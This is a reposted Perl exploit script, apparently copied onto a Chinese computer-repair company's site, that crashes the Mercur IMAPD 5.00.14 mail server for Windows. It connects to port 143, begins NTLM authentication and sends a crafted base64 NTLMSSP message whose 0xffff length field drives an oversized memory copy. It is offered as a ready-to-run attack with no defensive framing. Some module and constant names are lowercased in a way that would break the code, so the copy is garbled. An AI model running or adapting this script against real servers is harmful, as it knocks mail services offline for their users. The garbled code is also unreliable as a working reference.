Mercur IMAPD 5.00.14 Remote Denial of Service Exp

  #!/usr/bin/perl
  #
  # mercur-v1.pl
  #
  # mercur v5.00.14 (win32) remote exploit
  # by mu-b - dec 2006
  #
  # - tested on: mercur v5.00.14 (win32)
  #
  ########
  use getopt::std; getopts('t:n:', \%arg);
  use socket;
  use mime::base64;
  &print_header;
  my $target;
  if (defined($arg{'t'})) { $target = $arg{'t'} }
  if (!(defined($target))) { &usage; }
  my $imapd_port = 143;
  my $send_delay = 1;
  if (connect_host($target, $imapd_port)) {
  print("-> * connected\n");
  $buf = "1 authenticate ntlm\r\n";
  send(socket, $buf, 0);
  sleep($send_delay);
  print("-> * sending payload\n");
  # src = "ntlmssp....."
  $buf = "ntlmssp".("a"x100);
  send(socket, encode_base64($buf)."\r\n", 0);
  sleep($send_delay);
  # memcpy(s, src+a, b);
  print("-> * sending payload 2\n");
  $buf = "ntlmssp".
  "\x69".
  "\x03\x00\x00\x00".
  "\xff\xff".         # b
  ("a"x2).
  "\x00\x00".         # a
  ("a"x2).
  "\x00\x00".
  ("a"x2).
  "\x00\x00".
  ("a"x2).
  "\x04\x00".
  ("a"x6).
  "\x00\x80".
  ("a"x6).
  "\x04\x00".
  ("a"x12);
  send(socket, encode_base64($buf)."\r\n", 0);
  sleep($send_delay);
  print("-> * successfully sent payload!\n");
  }
  sub print_header {
  print("mercur v5.00.14 (win32) remote exploit\n");
  print("by: \n\n");
  }
  sub usage {
  print(qq(usage: $0 -t
  -t     : hostname to test
  ));
  exit(1);
  }
  sub connect_host {
  ($target, $port) = @_;
  $iaddr  = inet_aton($target)                 || die("error: $!\n");
  $paddr  = sockaddr_in($port, $iaddr)         || die("error: $!\n");
  $proto  = getprotobyname('tcp')              || die("error: $!\n");
  socket(socket, pf_inet, sock_stream, $proto) || die("error: $!\n");
  connect(socket, $paddr)                      || die("error: $!\n");
  return(1338);
  }
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

评论加载中... 内容： 评论者： 验证码：